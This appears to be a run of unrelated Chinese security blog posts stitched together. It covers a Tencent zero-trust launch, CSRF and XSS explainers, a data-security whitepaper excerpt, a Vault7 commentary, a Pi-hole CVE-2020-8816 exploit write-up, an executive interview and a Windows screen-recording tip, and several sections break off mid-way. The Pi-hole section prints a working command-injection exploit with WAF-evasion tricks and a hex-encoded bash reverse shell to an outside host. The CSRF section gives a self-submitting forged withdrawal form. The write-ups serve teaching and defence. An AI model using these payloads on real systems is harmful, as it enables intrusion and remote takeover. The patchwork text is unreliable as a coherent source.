后疫情时期，远程协同办公发展成为社会的新常态。保障员工在任何时间、任何地点高效办公的远程协同能力，成为企业运营开源节流、提升效率的关键。然而，企业如何保障办公的协同、效率、安全和体验？在此背景下，“零信任”安全理念的作用和价值得到了进一步的认可和体现。 6月24日下午，腾讯将举办“零信任产业标准工作组成立暨腾讯零信任安全管理系统iOA 5.0版本升级发布会”，宣布联合零信任产、学、研、用共16家单位，在中国产业互联网发展联盟标准专委会下成立“零信任产业标准工作组”，共同推动零信任系列团体标准的研究、研制与产业化落地，提高零信任技术的应用效率。 同时，腾讯结合行业领先技术和应用实践，自主研发的零信任安全管理系统iOA 5.0版本将重磅发布，助力企业打造“员工位于何处(Anywhere)、何时(Anytime)使用何设备(Any device)都可安全地访问授权资源以处理任何业务(Any work)”的新型4A办公方式，降低不同业务场景风险，保障远程协同办公的安全和体验。 ????扫描下方海报二维码，预约发布会直播????

什么是 CSRFCSRF(“跨站请求伪造”)：攻击者通过邮件、社区发帖等方式诱导受害者进入第三方网站，并且在第三方网站中向被攻击网站发送跨站请求；这主要是利用了受害者在被攻击网站已经获取的登录凭证(cookie)，且 cookie 会自动附在对特定域名的请求里的浏览器特性，达到冒充用户对被攻击的网站执行某项操作（如指定受害者的邮箱账户自动将所有收到的邮件都转发到攻击者的邮箱里）的目的。 几种常见的攻击类型GET 类型的 CSRF 攻击GET 类型的 CSRF 攻击非常容易实现，在<img>的 url 里构造恶意 URL 即可，用户在任何页面上只要加载了这个<img>，都相当于向该恶意 URL 发出了一次 GET 请求。 POST 类型的 CSRF 攻击这种类型的CSRF利用起来通常使用的是一个自动提交的表单： <form action="http://bank.example/withdraw" method=POST> <input type="hidden" name="account" value="xiaoming" /> <input type="hidden" name="amount" value="10000" /> <input type="hidden" name="for" value="hacker" /></form><script> document.forms[0].submit(); </script> 超链接类型的 CSRF 攻击跟上述两种 CSRF 攻击，超链接类型的 CSRF 攻击需要诱导用户主动点击，所以需要一定的欺骗手段，用户点击超链接后会跳转到攻击者构建的一个恶意 URL 里，也相当于是执行了一次 GET 请求。 CSRF的特点CSRF（通常）发生在第三方域名，但如果被攻击网站管控用户内容不严格的话，也有可能被发布恶意超链接等，这样防护起来就更困难了，因为 referer 是来自于本身。攻击利用受害者在被攻击网站的登录凭证，冒充受害者提交操作；而不是直接窃取或修改受害者的隐私数据。防护策略针对这两点，我们可以专门制定防护策略，如下： 阻止不明外域的访问 同源检测Samesite Cookie提交时要求附加本域才能获取的信息 CSRF Token / 双重 cookie 验证在 LocalStorage 里存放登录凭证同源检测浏览器在发送请求的时候，会带上origin和referer这两个 HTTP 头部字段，一般情况下，我们可以在收到请求的时候校验这两个字段是否来自可信的域名。 但是，虽然浏览器不允许修改origin和referer，但是有可能由于浏览器本身的机制，或者是攻击者刻意隐藏，导致请求里并没有这两个字段的信息，对于这种情况，可以考虑拦截掉。 Samesite Cookiecookie 有个SameSite属性可以防 CSRF 攻击，使用SameSite=Lax后，从别的网站提交 POST 表单或发送 ajax 请求时都不会附上 cookie ，这样就从根本上解决 CSRF 攻击。但这个SameSite属性只在现代浏览器上生效， IE 上是不支持的。 ...

什么是 XSSXSS，是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本，用户访问网站后不知不觉就执行了脚本，攻击者可获取用户的敏感信息，如 Cookie、SessionID 等。 XSS 的本质是：恶意代码没有经过过滤，与网站正常的代码混在一起；浏览器无法分辨哪些脚本是可信的，导致恶意脚本被执行。 XSS 分类根据攻击的来源，XSS 攻击可分为存储型、反射型和 DOM 型三种。 类型存储区插入点存储型 XSS后端数据库HTML反射型 XSSURLHTMLDOM 型 XSS后端数据库/前端存储/URL前端 JavaScript防止 XSS 攻击预防存储型和反射型 XSS 攻击存储型和反射型 XSS 都是在服务端取出恶意代码后，插入到响应 HTML 里的；因此预防这两种漏洞，有两种常见做法： 对文本内容做充分转义。标签和属性基于白名单过滤：对于富文本编辑器来说，其产物本身就是 html 代码，所以没办法简单粗暴使用转义来处理，应该要对内容中的标签和属性，基于白名单进行过滤。（附 XSS 黑名单：DOM 中的内联事件监听器如onclick等、<a>标签的href属性、<script>标签、css 中的url功能）预防 DOM 型 XSS 攻击不要直接把后端传来的数据作为 html 来渲染，比如innerHtml()/outerHtml()/document.write()等方法，又比如 Vue 的v-html；尽量使用textContent/setAttribute()。 CSP严格的 CSP 在 XSS 的防范中可以起到以下的作用： 禁止加载外域代码，防止复杂的攻击逻辑。禁止内联脚本执行。禁止外域提交，网站被攻击后，用户的数据不会泄露到外域。合理使用上报可以及时发现 XSS，利于尽快修复问题。其他安全措施HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。验证码：防止脚本冒充用户提交危险操作。附三种 XSS 攻击分类的详细解释存储型 XSS存储型 XSS 的攻击步骤： 攻击者将恶意代码提交到目标网站的数据库中。用户打开目标网站时，网站服务端将恶意代码从数据库取出，拼接在 HTML 中返回给浏览器。用户浏览器接收到响应后解析执行，混在其中的恶意代码也被执行。这种攻击常见于公开用户提交数据（UGC 内容）的网站功能，如论坛发帖、商品评论、用户私信等。 反射型 XSS反射型 XSS 的攻击步骤： ...

哈希算法---不可逆1、SHA1输入：小于2^64位的消息输出：160位摘要2、MD5 持续更新中...

大数据已被视为国家基础性战略资源，各行各业的大数据应用正迅猛发展，但随之而来的数据安全问题也日益加剧，有时甚至限制了大数据应用的发展。基于此，无论是国家机关还是企事业单位，都在加紧数据安全体系的建设，甚至项目立项时就需要完成数据安全的设计。 2020年5月27日，腾讯安全正式发布了企业级数据安全能力图谱，图谱中将数据安全能力分为四层六大模块，为使各企事业单位能够更好的理解和运用图谱，腾讯安全专家咨询中心联合腾讯安全内部核心部门，对当今重点的数据安全问题进行梳理，对国内近年来颁布的法律法规进行收集研究，对数据安全体系建设的思路进行归纳总结，最终形成本白皮书。 关注腾讯安全（公众号：TXAQ2019） 回复数据安全白皮书获取PDF版白皮书内容 以下是《腾讯数据安全解决方案白皮书》全文： 第1章 导读1.1  背景近年来数据安全事件频出，尤其个人隐私信息保护是行业关注的热点话题，GDPR法案的推出进一步推动了全球数据安全相关的法规和标准的建立和完善，企业的数据安全合规压力陡增，多数企业把数据安全摆在了整个信息安全体系提升的最重要的位置。然而，数据安全牵扯信息化各个层面的问题，在企业探究构建完善的数据安全体系时发现：数据安全体系建设是一项体系化工程，而非简单的技术工具运用，它是个复杂的大工程，从信息安全部门无法推动，尤其是一些IT建设有诸多历史问题的企业，达到法规和标准的合规要求，甚至要考虑信息系统的重构。当前，摆在企业信息安全管理者面前的问题是：如何平衡合规压力和无法改造的复杂业务和信息系统。企业应该构建哪些必备的模块化的数据安全能力，数据安全体系如何分阶段建设。 本白皮书基于数据安全能力图谱，通过客观、全面的对数据安全问题进行剖析，结合腾讯安全实践经验，提出数据安全建设思路和方法，旨在帮助企事业单位了解数据安全领域现状，理清数据安全体系建设思路。 1.2  国内法律法规现状数据保护越来越成为各国关注的焦点，目前我国法律法规的核心是监管和规范企业或个人对于数据的相关行为，以防止滥用数据，以及监管跨境数据转移等内容，重点保障国家、企业、个人的利益。 1）个人信息保护相关的法律法规 《民法典》：第四篇第六章针对隐私权和个人信息保护做出了规定。今后除了严重侵犯公民人身权利、财产权利的重大违法犯罪行为应当依照《刑法》承担刑事责任（可以附带提起民事诉讼）外，对于一般的侵害个人信息权的侵权行为，任何自然人或组织均可以从侵权法的角度进行维权，以个人信息权被侵犯为由提起民事诉讼。 《刑法》：2009年的《刑法修正案七》、2015年的《刑法修正案九》明确了任何单位、组织、个人违反有关规定，出售或向他人提供公民个人信息，情节严重的，都将构成犯罪。在2017年的《刑法修正案九司法解释》中，明确了公民个人信息的范围包括身份识别信息和活动情况信息，细化了非法获取、提供公民个人信息的认定标准，对侵犯公民个人信息犯罪的定罪量刑标准和有关法律适用问题作了全面、系统的规定，为司法实践中开展公民个人信息保护提供了强有力的支撑。 《网络安全法》第四十条至第四十五条，对个人信息保护做出有关规定，明确了我国个人信息保护的基本原则和框架，网络运营者保护用户信息的义务，要求网络运营者对其收集的用户信息严格保密，建立健全的用户信息保护制度。 此外，各行业主管单位也开始高度重视个人信息的保护工作，出台专门的个人信息保护法律法规。工业和信息化部于2013年出台了《电信和互联网用户个人信息保护规定》（《电信规定》) ，对违反规定的行为应当承担的法律责任进行说明。2014年开始实施的《消费权益保护法》也在第二十九条中对个人信息保护做了明确规定。由国家互联网信息办公室发布，于2019年10月起实施的《儿童个人信息网络保护规定》明确了儿童信息保护的原则和框架。 2）数据安全法律法规 目前针对数据安全法律法规主要是《网络安全法》，其中第十、十八、二十一、二十七、三十一、三十四、三十七、六十六条分别对网络服务中的数据安全保护做了规定，涉及数据安全原则、目标、措施、义务和责任。依据《网络安全法》，各部委也做出了一些相关的法规进行细化完善。目前有2020年的《网络安全审查办法》、2019年的《数据安全管理办法（征求意见稿）》、2018年的《网络安全等级保护条例（征求意见稿）》。 此外，已列入本届人大立法计划的《个人信息保护法》、《数据安全法》等法律将与《网络安全法》形成我国数据安全的法律体系。 1.3  腾讯持续发力数据安全领域1）参与制定国家级、行业级规范 国内数据安全标准主要由全国信息安全标准化技术委员会（TC260）负责，围绕数据安全和个人信息保护两个方向，TC260已发布6项国家标准，在研标准10项。 在个人信息保护方向，腾讯参与了GB/T35273《个人信息安全规范》、《个人信息影响评估指南（报批稿）》、《个人信息安全工程指南（报批稿）》、《移动互联网应用（APP）收集个人信息基本规范（征求意见稿）》。同时，腾讯牵头了《个人信息告知同意指南》国家标准研究项目，目前该研究项目已转成国标，由电子四院负责。 在数据安全方向，腾讯参与了GB/T35274《大数据服务安全能力要求》、GB/T37973《大数据安全管理指南》、《电信领域大数据安全防护实现指南（草案）》。 此外，腾讯还牵头了行业标准《移动应用软件开发工具包（SDK）安全使用规范》，布局移动应用底层数据安全和个人信息保护。 2）数据安全生态建设 腾讯安全秉承“让数据遵规守序”的理念，以“协作共赢”的态度，联合生态伙伴，共同让“数据管理遵循法规，让数据流动遵守秩序”。腾讯安全会积极与各行业保持紧密的交流，不断提升生态的协作能力。 第2章 亟需解决的数据安全问题我们收集和汇总了企业数据安全建设过程中遇到的问题，归纳下来，比较突出的有以下六个方面。 2.1  数据资产清册问题数据资产清册问题主要体现在如下三个方面： 1）资产状况不清 到底拥有多少数据资产？数据资产的变化情况是怎么样？是否有不明资产和违规资产？实际资产与在册资产是否存在差异？差异情况如何？敏感数据有哪些？都存储在哪里？ 2）访问状况不清 访问热度如何？有哪些静默资产？哪些是高频资产？敏感数据都在被谁访问？是否存在僵尸库？ 3）权限状况不清 数据资产的权限变化情况是怎么样的？在某时段内是否发生了提权操作？都有哪些数据帐号？帐号都在被谁使用？帐号的权限是否与登记的有差异？是否有弱口令帐号？是否存在帐号权限过大、违规的情况？ 以上三个方面的问题都是资产不清的具体问题。数据资产梳理是一个持续的过程，数据和业务是不断发生变化的，因此，需要借助自动化工具来开展数据资产管理工作。准确掌握数据资产状况，是开展数据安全体系建设的基础条件。 2.2  管理责任不清目前国家施行的法律法规通常都会要求明确数据责任，通过加大惩罚力度，来提升数据安全防范意识，规避“数据资产无人管、数据资产随意用”的现象，数据资产责任不清主要体现在如下两个方面： 1）数据资产未认责 数据资产体量大，且使用复杂，贯穿整合业务流程，涉及多个部门和岗位的人员，数据的所有权，使用权，安全责任等无法清晰划分；同一资产涉及多个部门或团队使用，且使用频率和重要性无法量化，导致资产认责工作无法开展； 2）管理角色的职责边界模糊 数据安全管理角色包括数据资产管理员、数据库管理员、安全审计员、安全检测工程师、数据运维工程师、权限管理员等，一般情况下这些角色可能会由研发、运维、安全、运营人员来兼任，没有独立的团队或虚拟团队，导致权责不清，不利于整体提升数据安全防护能力。另外，一旦发生数据安全事件，很难开展追踪溯源工作。 2.3  制度不完善1）制度规范未落实或难落实 制度规范是数据安全管理和安全技术落地的依据。在开展制度规范编写工作时，由于没有对现状进行充分的调研，管理制度规范与实际技术措施无法对应，导致数据安全体系无法落实。 2）缺少稽核手段 建立了一套切实可行的制度规范，进行了相关的贯彻与执行，但由于缺少稽核手段，安全管理部门无法及时掌握执行情况。数据安全管控措施无法按照管理制度体系要求严格执行。 2.4  数据交换管理混乱随着数据应用的快速发展，企事业单位内部向外提供的功能越来越多（小程序、公众号、APP、Web等），数据会向外部、内部和合作伙伴进行交换共享，随着开放的接口越来越多，交换关系越来越复杂，若未将交换共享的方式和接口标准化，则会出现功能重复、调用复杂、多点登录等现象，运维人员和应用系统负责人的压力也会倍增，影响数据应用的发展。 2.5  安全技术措施零散1）数据安全产品功能分散 现有的数据安全产品，大多都是单一数据安全功能，如：脱敏，加密，防泄密，企业部署了很多数据安全类产品，再加之企业数据分布也相对分散，导致各各网络区域各数据安全产品间无法形成有效联动和和整合机制，导致数据安全管控能力分散，无法形成统一数据安全管控体系。 2）安全能力孤岛 由于组织内部的应用会按照部门划分，数据安全能力的建设也会以部门为单位开展，没有形成整体的防御体系，造成安全短板，容易被不法人员利用。 另外一个维度是角色和职责不明确，IT各部门没有将安全责任进行清晰的划分，当发生数据安全事件时才考虑防护。即便是有主动建设的意愿，也是各自申请各自建设。 2.6  审计能力不足通过对全栈日志的收集与分析，能够有效的制定安全规则，在大量的访问中自动发现违规和高危行为，降低了数据安全管理员的工作量和风险识别的难度，同时也提升了准确率。 但是，当遇到“心脏滴血”、APT这类攻击时，由于这种攻击是用真实的身份、合规的操作，做非法的事情，所以攻击的操作轨迹和规律很难被发现，加之这类攻击并没有触碰到现有的规则，导致安全攻击一直在发生，管理人员却一直不知道。 第3章 数据安全工作思路3.1  工作目标1）让数据流动遵守秩序 进入大数据时代后，各类数据将陆续开放，数据应用会越来越多，数据交叉共享会越来越复杂，在这种情况下一旦发生数据安全事件，影响范围是无法估量的。在复杂的数据流动情况下，更容易出现疏忽的地方，这给数据安全防护带来了具大的挑战。传统的方式是针对风险点采取管理手段或技术手段进行管控，相当于“头痛医头、脚痛医脚”的方式，但在复杂的数据流动场景下，单一的数据安全技术或产品是无法整体提升数据安全管控能力的，也无法适应数据应用场景的快速变化。因此，数据安全防护是一项体系化工程，需要联合生态的力量，在数据流动过程中建立秩序。只有数据在流动时遵守秩序，才能保证数据能够安全的使用，促进数据应用的发展。 2）防泄露、防篡改、防滥用 ...

【导读】三年前，一场美国史上最大数据泄露事件，“撼动”了美国中央情报局（CIA）的世界级地位。三年后，一份的“沉寂”报告被全面公开，直指美中情局的各种“不作为”行径。余浪不断的CIA军火库泄露事件背后，究竟隐藏着何种不为人知的秘密？大国背后的网络安全问题凭何遭到“诟病”，安全防御失效、隐患重重之下，究竟是何作祟？今天，我们就来讲讲“Vault7（穹窿7）”这段“史诗级”军火库被泄露事件的“前因”与“幕后”。 众所周知，美国中央情报局（CIA）作为世界最大，最著名的情报机构，其基本职能就是收集、整理、分析、评估各方情报，并把这些情报提供给美国政府各个部门。 “颠覆政变、只手遮天、制造混乱”一度成为美国中央情报局的热门代名词。 而近年来，随着网络信息化的不断深化，美国中情局也逐步开始将触角伸向数据信息、网络监视甚至个人隐私领域上。 2011年8月，继微软之后，中情局要求谷歌交出储存在欧洲资料中心的数据，引发了欧美外交论战。2013年6月，前中情局雇员爱德华·斯诺登曝光“棱镜”项目，指控中情局长期对境内外监控监听。2014年10月，中情局着手研究渗透汽车控制系统的黑客工具，其中一个功能就是，探测汽车上存在的可能的暗杀阴谋。…… 可以说，“不可一世”的美国在当时的世界网络情报数据的掌控与网络武器的运用已经到达“炉火纯青”的地步。 然，极速飞行必有风险，美国中央情报局的“高光时刻”延续到2017年就遭遇重创。 这一年，维基解密（WikiLeaks）对“Vault7（穹窿7）”的曝光，将美中情局推上舆论的风口浪尖，引起国际社会的强烈抗议。与此同时，也给美国中情局自身安全防御领域强有力的一击。 如今三年已过，对于此次“重磅级”泄露事件或仍心有余悸的美国，终于肯就此进行公开“复盘”。 昨天，美国参议院情报委员会一名参议员罗恩·怀登（Ron Wyden）公布了一份关于2017年CIA违规的内部报告。该报告称： 许多美国中央情报局最敏感的黑客工具的安全性都非常差。尤其在过去十年中，美国情报界一而再，再而三地遭受大规模泄密事件的打击。 其中，就包括情报局“史诗级”军火库“Vault7（穹窿7）”的泄露，怀登更是将其称为“可悲的松懈”。 更为恐怖的是，如果维基解密方没有公布批量泄露的CIA黑客工具，美中情局仍不会知晓其内部已遭到网络攻击。 此外，该报告还表示：“我们大多数敏感的网络武器都没有隔离，用户共享系统管理员级别的密码，没有有效的可移动媒体控件，并且历史数据可以无限期地提供给用户…… 而由于与日常代理商员工广泛使用的系统分开，导致该专门部门及其所依赖的利基信息技术系统采取的网络安全措施不严。“ 针对这份报告¹，或者一言以蔽之“安全防御性太差了”。 可以说，今天这场全新的“复盘”，让看似“老生常谈”的CIA网络军火库泄露事件的“幕后”再被深挖一层，而这深层的一点竟是“极度松懈”下的买单？ 而透过报告及其结论，智库从中也看到了几点端倪： 其一，只“攻”不 “防”的处置态度 据外媒报道，在致新任国家情报局局长约翰·拉特克利夫的信中，中央情报局就明确表示，“即使以损害自身系统为代价，也要优先建造网络武器。”足见，美国最高情报机构网络安全防御的消极宽松处理态度。 所以，如果一味地追求攻击端的能力而忽略防御体系地完善，将极大增加网络威胁风险，其后果更是不堪设想。 其二，“亡羊”未见“补牢”的处置手段 罗恩·怀登表示，距离提交违规报告已有三年时间，但中情局的网络情报中心至今仍未实行任何防控数据被盗的计划。情报界处于落后阶段，甚至未能采用在联邦政府其他地方广泛使用的最基本的网络安全技术。 亡羊补牢都未必可以补救过失，更不必说，发生威胁后的无动于衷了。忽略已知的安全隐患，一定程度上就是为攻击者大开攻击的“方便之门”。 其三，人是网络安全最“薄弱”环节 纵观此次事件始末，不管是窃取CIA军火库的前雇员，还是内部安全人员、决策者都有着逃脱不掉的责任。如果内部无法形成相应的安全警告或严惩方式，自然就不会对其做出响应。 可以说，解决不了人的问题，安全威胁将必然存在。 智 库 时 评 即使是超级大国，即使是超级大国的中央情报局又如何，在“可悲宽松”的安全性面前，谁都是在扮演“近乎裸奔”的角色，最终都难逃被渗透攻防的命运。 参考链接： [1]报告链接－https://www.wyden.senate.gov/... [2]threatpost－《中央情报局“ 7号避难所”秘密被盗》

mark正则表达式的分类

1、前言最近偶然看到了Pi-hole <=4.3.2远程代码执行漏洞（CVE-2020-8816）相关的文章，漏洞成因不是很难，但是里面构造的Exp引起了我的兴趣。由于Pi-hole代码对命令注入的参数整体做了大写转换，因此用到了shell参数扩展进行绕过，后面我查询了相关资料，发现这种方式非常灵活，可被用在命令注入攻击中以绕过传统WAF。 2、CVE-2020-8816简单复现分析我们下载了Pi-hole 4.3.2版本进行安装，安装成功后会提示访问http://pi.hole/admin进行Web界...。该漏洞为授权命令执行漏洞，Pi-hole安装完成后会在界面生成一个随机密码。成功登录后，访问Setting-DHCP，在下图的Mac address处可进行命令注入 此时我们填写参数并抓包，发现请求的文件路径为/admin/setting.php，仔细查看了setting.php文件逻辑，发现该文件主要用来展示设置的内容和布局，并且是php和html混合的方式，并没有进行保存操作的代码，但是我们在代码第9行发现引入了scripts/pi-hole/php/savesettings.php 跟进到savesettings.php，发现会检查POST参数中field的值，并利用switch case判断，此时抓取的数据包中field为DHCP，可以跟进到548行。命令注入点AddMAC被赋值给$mac，并且在556行会由validMAC方法进行校验。 我们继续跟进validMAC方法，发现只要匹配到12个数字字母即返回成功，正则表达式中没有设定开始结束符号导致可以插入任意字符，随后$mac在604行直接拼接到exec方法中，从而导致命令注入。 但是在560行会将$mac所有字符转成大写，我们知道linux中的命令是区分大小写的，大写的如”ID”、”WHOAMI”等都是无法执行的，但是PHP中的函数是不区分大小写的。因此漏洞作者引入了shell参数扩展的方法，通过模式匹配获取小写的p、h、r等字符。 这里我们可以根据env中的常量进行截取： $PATH=’ /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin’ $W=${PATH##*:/}=’snap/bin’ $Y=${W%%/???}=’snap’ $P=${Y#???}=’p’ $PWD=’/var/www/html/admin’ $I=${PWD#/???/???/} $H=${I%???/?????} $Q=${PWD%/???/????/?????} $R=${Q#/??} 那么可以构造如下的Exp： 123456789123&&W=${PATH##\*:/}&&Y=${W%%/???}&&P=${Y#???}&&I=${PWD#/???/???/}&&H=${I%???/?????}&&Q=${PWD%/???/????/?????}&&R=${Q#/??}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("62617368202D63202762617368202D69203E26202F6465762F7463702F312E312E312E312F3930393020303E263127"));'&& 3、Shell参数扩展介绍Shell参数扩展的绕过方式非常有意思，在命令注入漏洞的利用中可能被用以绕过WAF等。我也去查询了一下相关的资料，参数扩展定义如下：在shell中可以使用花括号${}包裹参数来防止紧跟在参数后面的字符串被当作参数变量名的一部分，所以最基本的参数展开就是${parameter}，常见的可被利用的有以下操作： 大小写转换： ${parameter^pattern}  //对pattern匹配的第一个字符转成大写 ${parameter^^pattern} //对pattern匹配的所有字符转成大写 ${parameter,pattern} //对pattern匹配的第一个字符转成小写 ${parameter,,pattern} //对pattern匹配的所有字符转成小写 字符串删除： ${parameter#pattern} //从头开始匹配符合pattern的数据，则将符合的最短的数据删除 ${parameter##pattern}//从头开始匹配符合pattern的数据，则将符合的最长的数据删除 ${parameter%pattern}//从后开始匹配符合pattern的数据，则将符合的最短的数据删除 ${parameter%%pattern}//从后开始匹配符合pattern的数据，则将符合的最长的数据删除 可以举一个简单的例子如下图，在知道$PATH的情况下可多次利用模式匹配进行字符串删除留下可用字符，从而执行id命令。 参数切片： ${parameter:offset:length} //从offset下标处截取长度为length的部分 使用切片的方式可以更方便地截取字符。 参数替换： ${parameter/pattern/string} //将pattern匹配的部分替换为string 在命令注入时可以将敏感词进行变形，以替换的方式进行绕过。 其中模式匹配pattern常见有下面的符号： * //匹配任意字符串 ？//匹配任意单个字符 […] //匹配集合中任意一个字符 经过实际测试，发现诸如PHP、JAVA等语言的命令执行函数，不能完全支持shell参数扩展的方式。在PHP 7.0.3环境下，使用system、exec、shell_exec命令执行方法，只支持上述字符串删除的方式；而在JAVA1.8环境下，Runtime.getRuntime().exec则支持上述所有方式。 4、安全产品解决方案百度安全一体化产品已支持CVE-2020-8816检测和拦截， 并且通过AI学习的智能白模型也能很有效地拦截Shell参数扩展造成的变形。有需求的客户可以登录anquan.baidu.com联系我们。 ...

在疫情和新基建的双重刺激下，大量企业加速了数字化转型步伐。疫情期间，不少企业展现出了较强的韧性，从战疫中突围。但在此过程中，面对突然提速的发展频率，企业的安全建设是否做好了准备？以及，迈进产业互联网，企业需要搭载什么样的安全体系，才能更从容地迎接挑战？日前，腾讯副总裁丁珂接受了《南方日报》的专访，给出了腾讯安全的思考。 来源：南方日报 撰文：叶丹 以下为采访全文： 随着国家大力推进新基建，在5G、云计算、大数据、物联网、人工智能等新技术带动下，产业互联网也步入了一个高速发展期。今年全国两会，人大代表马化腾在议案中建议把产业互联网放在新一轮科技革命和产业变革的历史大潮中来谋划，从国家战略的高度重点推进。 腾讯副总裁丁珂在接受采访时就表示，产业互联网的繁荣一方面会为中国数字经济提供强劲驱动力，另一方面也给网络安全带来新的挑战：数据将成为产业互联网时代的全新生产要素。数据在产业链中的采集、挖掘和使用，关系到国家安全、企业商业利益和个人信息保护，一旦出现安全问题，将造成极大损失。同时，新基建推动新技术广泛的创新应用，也会带来全新的安全风险和安全问题。如5G和工业互联网带来“触网”终端数量与种类爆发式增长，原来以被动防御为主导的安全理念已无法满足需要；数据的无限流动，也会给安全防护带来巨大挑战。 IDC今年3月发布的《全球网络安全支出指南》显示，虽然中国网络安全投资在整体IT投资中的占比日益提升，但相较于全球仍存在较大差距。“我们必须要认识到，新基建将加速产业互联网发展，而网络安全是新基建发展的根基。”丁珂认为，建立契合产业互联网的新型安全体系，已经成了迫在眉睫的议题。 产业互联网下 安全缺位动摇企业生存根基 丁珂在谈到产业互联网与网络安全的关系时就表示：“腾讯安全是网络安全的先行者，我们见证和亲历了中国互联网产业的发展，从PC互联网到移动互联网，再到产业互联网的发展演进，这个过程中信息安全本身也在发生重大变化。过去我们认为安全是企业发展的‘底线’，‘没有消息就是好消息’的安全认知，也体现了过去‘被动防御’的安全理念；产业互联网时代，我们需要扭转这个观念：安全不仅是企业发展底线，同时也是决定企业发展高度的‘天花板’。” 针对今年的疫情，丁珂认为，企业的数字安全布局也凸显了重要性。“以这次疫情为例，我们发现那些数字化做得比较好的行业，往往能通过远程协同、在线开展业务等各种数字化手段最大限度降低疫情冲击，而在数字化抗疫的过程中，企业的数字安全布局，成为其线上业务得以顺利开展的基本保障。以对信息安全特别审慎的银行业为例，因为过去几年金融科技的发展以及人脸识别、大数据风控、身份认证、远程授信等安全方案的引入，银行常规业务基本上已经实现数字化，用户足不出户也能远程办理业务；今年疫情给实体行业造成了比较大的影响，但我们也看到一些提前部署的银行企业可以通过无接触数字化技术保障了业务正常开展。很多‘触网’较早的零售、餐饮企业，也通过直播、电商、线上业务等多种数字化手段降低疫情的冲击，展现出了很强的抗风险能力。” 丁珂表示，过去很长一段时间内，很多企业基本上处于业务发展先行、信息安全补课的状态，市场主体缺乏安全意识，更舍不得在信息安全建设上投入预算。由于过往相关法律法规不够健全，一些企业主体即便发生信息安全事故，造成用户个人隐私及企业声誉受到影响，也不会有致命性损失；但在产业互联网时代，由于数字化贯穿到了产业发展的各个链条——采购、研发、生产、交付、流通、售后，数据是企业核心资产，因此安全缺位动摇的是整个企业的生存根基，甚至波及产业上下游链条的参与方，其影响更加深远。不仅如此，在金融、零售、汽车出行等产业领域，信息安全的缺位还会成为企业数字化转型发展的一大阻碍，成为企业发展的“天花板”。 产业安全需纳入企业数字化转型的顶层设计 产业互联网正在对生产关系进行重构，数据成为产业互联网时代的核心生产要素。丁珂就认为，需要建立以产业为中心的数字原生安全体系，转变安全思维，构建积极主动的安全防御体系，将产业安全纳入企业数字化转型的顶层设计。“首先要改变观念，把安全提升到战略地位，真正变成CEO关注的‘一把手工程’。”在具体实施中，以下几个方面的内容是丁珂认为需要重点投入的： ➤第一，云已经成为数字化的基础设施，因此需要对云上安全展开全面、前瞻性的研究，提供全业务场景、全生命周期的安全产品和解决方案，提供适用于云上需求、与云的快速发展相匹配、能够实时弹性调用的云原生安全能力，整体提升企业数字化的安全基准线，降低企业的安全准入门槛。 ➤第二，推进基于零信任的无边界访问控制系统和相应的数据保护技术和密钥技术的建设。随着各个实体产业“上云”，内外部访问数据的物理边界和时间边界会不复存在，原先存储在特定场景的数据会进入传输和流通环节，如何保证自动化发现、丰富的脱敏算法，以及对于不便于脱敏的数据如何进行通过水印技术进行溯源追责，是需要重点投入的领域。 ➤第三，建设全流程的、可复用的安全管理体系和安全事故的问责体系。除了对越来越丰富的联网设备的安全管理，包括更新设备固件、排查漏洞、设备安全防护，对于失效设备的及时“断网”等等，还需要对业务链条上所有参与者的行为检测和管理，即时发现异常行为，排除安全风险。 丁珂表示，企业需要从经营的战略视角对信息安全建设进行前置规划，提升信息安全意识，根据自身业务发展需求，引入与之匹配、专业化、体系化的信息安全解决方案，构建可知、可见、可控的信息安全网络。 对处于产业数字化转型期的企业和大量通过上云寻找机遇的中小企业来说，从无到有建立安全团队、研发技术可能是一个很重的负担，加上产业数字时代的市场竞争瞬息万变，这些转型期的企业普遍缺少网络安全的意识、经验和能力积累，这也是包括腾讯安全在内的网络安全服务商努力解决的问题。据丁珂透露，目前，腾讯开放了基础安全能力和业务安全能力，一方面通过通用的安全中台为企业供模块式、可迭代的安全服务，另一方面也和行业客户一起探索业务场景下的安全，提出解决方案，目前在泛金融、泛互联网、智慧零售等领域都取得了不错的成效。 夯实安全地基 提升数字经济实力 “建设适应于产业互联网发展的网络安全体系，总体还处于起步阶段，单纯依靠某一家安全企业无法解决所有问题。”丁珂认为，建立安全生态圈、不同主体之间的协同越来越成为行业发展的一个共识，建立政府部门、行业组织、市场主体共同参与的安全生态，也将成为安全产业发展的重要基础。 丁珂在接受采访时强调，头部安全厂商应该充分发挥研发主体、创新主体、产业主体的作用，通过开放的方式促进生态伙伴之间开展合作。据介绍，在2017年互联网安全领袖峰会上，腾讯联合天融信、卫士通、启明星辰、绿盟科技等国内13家上市安全企业发起成立了安全领袖俱乐部，旨在共同探索产业合作与发展，2019年已经扩大到17家，持续加深了开放、互通、共享的协作机制，通过安全生态链的协同共建，打造贴近真实业务场景的安全解决方案，降低企业客户的安全门槛，保障各行各业的安全发展，共担守护产业互联网安全的职责。除此之外，腾讯安全也在探索更多促进产业合作的机制。 据中国信息通信研究院2019年发布的白皮书显示，2018年我国产业数字化规模超过24.9万亿元，占GDP比重27.6%，数字经济增速显著高于宏观经济指数，成为拉动经济增长的重要引擎。丁珂表示：“随着新基建的稳步推进、产业互联网的纵深发展，数字化未来仍将为中国经济转型提供持续的动力。网络安全和信息化是一体双翼，夯实安全地基，有助于提升中国数字经济硬实力，在国际竞合中占据更多主动权。”

不少的朋友在使用win10录屏功能的时候发现录得视频都没有画面，那么这是怎么回事呢？下面就给大家带来了详细的解决方法，一起来学习一下吧。 win10录屏没有画面怎么办： 方法一、 尝试重新启动录制工具，如果还是不行建议重启电脑尝试。 方法二、 1、遇到黑屏可以尝试卸载显卡驱动，然后从官网下载重新安装最新版本的驱动 2、打开“设备管理器”点击“显示适配器” 3、右键，选择“卸载”即可

